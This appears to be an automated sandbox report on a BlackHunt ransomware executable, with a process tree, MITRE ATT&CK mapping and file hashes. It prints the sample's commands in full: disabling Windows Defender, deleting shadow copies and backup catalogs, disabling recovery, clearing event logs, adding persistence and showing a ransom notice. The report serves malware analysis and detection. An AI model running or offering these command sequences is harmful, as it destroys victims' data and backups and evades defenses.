ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 58 PID 2988 wrote to memory of 2900 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 58 PID 2988 wrote to memory of 2900 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 58 PID 2988 wrote to memory of 2900 2988 ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe 58 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe"C:\Users\Admin\AppData\Local\Temp\ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2988 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:2572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2588
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2604
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:1088
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2324
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2124
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:564
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1480
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:368
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1472
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2552
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1192
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:660
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2888
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2900
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2924
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2948
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2752
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2872
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:952
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1504
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1492
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2272
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:3524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1092
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1756
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1396
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe" /F2⤵PID:1584
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe" /F3⤵
- Creates scheduled task(s)
PID:3512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2108
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2436
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1516
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2256
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:988
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1628
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2440
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1832
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2140
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2280
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1420
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:2340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3388
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:3268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3852
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2844
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2280
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1632
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:988
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:1892
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2136
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2084
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2916
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2908
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1992
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2016
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1996
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:1576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2768
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:3392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3224
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:940
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:1780
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:532
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2904
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:1084
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2300
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\ce59e40504830fab49a497613d96dad2093719ed07b2dbc4221cffac99cd1543.exe"2⤵
- Deletes itself
PID:2044 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:4072
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3640
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2912
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:3152
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD58d7937033e43a8679cf9b6dcd2267a3d
SHA1c3e14e9994dd4c947f36e57acad5f6ef71ea894f
SHA2566abcffb7f2d7b852c8dd6d9e175f717800ac0fe66462cc5e883242571e13008e
SHA5126d810919402afd8d5ed2df72d33862a80d81a3109046a0dbf5730d7fa5e5726ec63b1f4605d8705ec12853441c97cd5a93d7c7d7d5e13f670bb9d5079db5ff97
-
Filesize
12KB
MD5c008a232a53bbd3e0055f79c2591530b
SHA198261cf9dc8246f508556ba6bc4b991cc7ba07a6
SHA256d5d65160f120ac082a19979f9f751fd023d9739ca25778b7f67c66d172621d70
SHA512fdac48abd2bd51f2991c299728019cd477ef892101f930c80ee1e21668a6c0ee1ea9ddb8384ac7a577b1a0d3fe5ab86589dd8547dd27c5ada25e1a0a79921695
-
Filesize
684B
MD5191a7812751da7f45c00cadf8558f782
SHA1425cdedaca0b261b6889eeecb16f6c98a0d1a66b
SHA256c0f9a73e9b3998fd2866da7ebb4485cae757117289e2ae1ae7b176f3f15d1c43
SHA5125c2d108cdd4f7961739a27722f8b55ba3543475afb270aaebf7eafb47feaeac315abc85c133b6fcceffe47b7a6a0a1f6e9d0e566072f0e0abc3760df56fa00ea